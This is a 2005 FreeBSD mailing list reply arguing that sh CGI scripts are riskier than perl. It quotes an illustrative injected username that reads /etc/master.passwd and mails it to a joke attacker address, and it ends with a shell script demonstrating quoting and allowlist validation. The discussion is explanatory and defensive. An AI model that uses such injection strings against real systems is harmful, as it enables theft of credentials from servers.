From owner-freebsd-questions@FreeBSD.ORG Sat Feb 5 06:19:34 2005
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1EE316A4CE for ; Sat, 5 Feb 2005 06:19:33 +0000 (GMT)
Received: from hosea.tallye.com (joel.tallye.com [216.99.199.78]) by mx1.FreeBSD.org (Postfix) with ESMTP id D635543D2D for ; Sat, 5 Feb 2005 06:19:32 +0000 (GMT) (envelope-from lorenl@alzatex.com)
Received: from hosea.tallye.com (hosea.tallye.com [127.0.0.1]) by hosea.tallye.com (8.12.8/8.12.10) with ESMTP id j156JJGf017634 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Fri, 4 Feb 2005 22:19:19 -0800
Received: (from sttng359@localhost) by hosea.tallye.com (8.12.8/8.12.10/Submit) id j156JIDv017632; Fri, 4 Feb 2005 22:19:18 -0800
X-Authentication-Warning: hosea.tallye.com: sttng359 set sender to lorenl@alzatex.com using -f
Date: Fri, 4 Feb 2005 22:19:18 -0800
From: "Loren M. Lang"
To: Dan Nelson
Message-ID: <20050205061918.GG8619@alzatex.com>
References: <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <20050125194736.GD76109@xor.obsecurity.org> <20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050205041344.GK25463@dan.emsphone.com>
User-Agent: Mutt/1.4.1i
X-GPG-Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
X-GPG-Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C
cc: Paul Schmehl
cc: "Donald J. O'Neill"
cc: Warren
cc: Gert Cuykens
cc: "Loren M. Lang"
cc: Kris Kennaway
cc: freebsd-questions@freebsd.org
Subject: Re: perl and ports
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
List-Id: User questions
X-List-Received-Date: Sat, 05 Feb 2005 06:19:34 -0000

On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote:
> In the last episode (Feb 04), Loren M. Lang said:
> > Actually, I think you should work on sh first, it's a much bigger
> > security hazard than perl. If you've ever written much sh, you'd
> > realize with its much looser syntax, it's easy to get into trouble.
> > At least perl provides use strict and -Tw. Someone using sh to write
> > cgi scripts is the worst. Imagine someone writing the following like
> > for a sh cgi script where $USERNAME is a cgi parameter passed into
> > the following script:
> >
> > echo "Welcome, " $USERNAME ""
> >
> > What if someone wrote the following username and apache was running as
> > root:
> >
> > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo
>
> Then you would get a web page containing:
>
> Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo
>
> . The shell doesn't re-interpret its input unless explicitly told to
> via the "eval" command. /bin/sh is a little limited for more complex
> scripts due to its lack of arrays, though, so zsh/ksh/bash are much
> better choices :)

Well, my email was meant as a joke and I didn't bother to validate
anything I wrote, I just remember reading something along these lines
in a cgi book warning of the dangers of sh scripting for cgi scripts.
The original example was more elaborate and probably did use eval, but
my point is that sh can be more dangerous than perl since it uses a
looser syntax. By not using "'s around $USERNAME, it will end up being
parsed as multiple arguments which, for echo, isn't a big deal, but for
most commands you can end up shooting yourself in the foot. I definitely
would not recommend removing it from the system or even recommend
against using it for anything, but just pointing at the irony of
considering perl a giant security hole. Mostly, I have just found this
whole thread very humorous, and I wonder what the reaction of the
developers will be when he tries asking them to stop using perl.

> --
> 	Dan Nelson
> 	dnelson@allantgroup.com

--
I sense much NT in you.
NT leads to Bluescreen.
Bluescreen leads to downtime.
Downtime leads to suffering.
NT is the path to the darkside.
Powerful Unix is.

Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C
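The two points made in this exchange, that an unquoted `$USERNAME` is word-split into several arguments while the shell does not execute anything inside the value unless `eval` is used, can be checked directly in /bin/sh. The script below is an added example, not code from either poster; the function names, the allowlist pattern, and the constructed input `charlie;  echo injected` (two spaces, so the splitting is visible) are assumptions made for the demonstration. The third function shows the check a CGI script should apply to such a parameter before using it anywhere: reject the value unless every character is on an allowlist.

```shell
#!/bin/sh
# Added example (not from the thread). Shows how /bin/sh treats a CGI
# parameter under unquoted vs. quoted expansion, and an allowlist check
# a script can apply before using the value. Nothing here runs eval.

# Unquoted expansion: the value is word-split on IFS, so runs of blanks
# collapse to one and the value arrives as several arguments. The ';'
# inside the value is still plain text; the shell does not execute it.
greet_unquoted() {
    USERNAME=$1
    echo "Welcome, " $USERNAME ""
}

# Quoted expansion: the value is passed as a single argument, byte for byte.
greet_quoted() {
    USERNAME=$1
    echo "Welcome, $USERNAME"
}

# Allowlist check (assumed policy): accept only letters, digits, '_', '.'
# and '-'. Anything else, including ';', '|', blanks and '@', is rejected
# before the value is used in any command line, quoted or not.
valid_username() {
    case $1 in
        "") return 1 ;;
        *[!A-Za-z0-9_.-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Constructed input for the demonstration (two spaces after the ';').
PAYLOAD='charlie;  echo injected'

# Demonstration when run directly.
greet_unquoted "$PAYLOAD"   # blanks collapse, trailing "" adds a space
greet_quoted "$PAYLOAD"     # value printed verbatim
if valid_username "$PAYLOAD"; then echo "accepted"; else echo "rejected"; fi
if valid_username charlie; then echo "accepted"; else echo "rejected"; fi
```

Compare the first two lines of output: the unquoted form prints `Welcome,  charlie; echo injected ` (double space after the comma, single space inside the value, trailing space from the empty argument), the quoted form prints the value exactly as received. For `echo` that difference is cosmetic, which is the point made above; for a command whose arguments carry meaning, the extra arguments are where things go wrong, and the allowlist check is what keeps such a value from reaching any command in the first place.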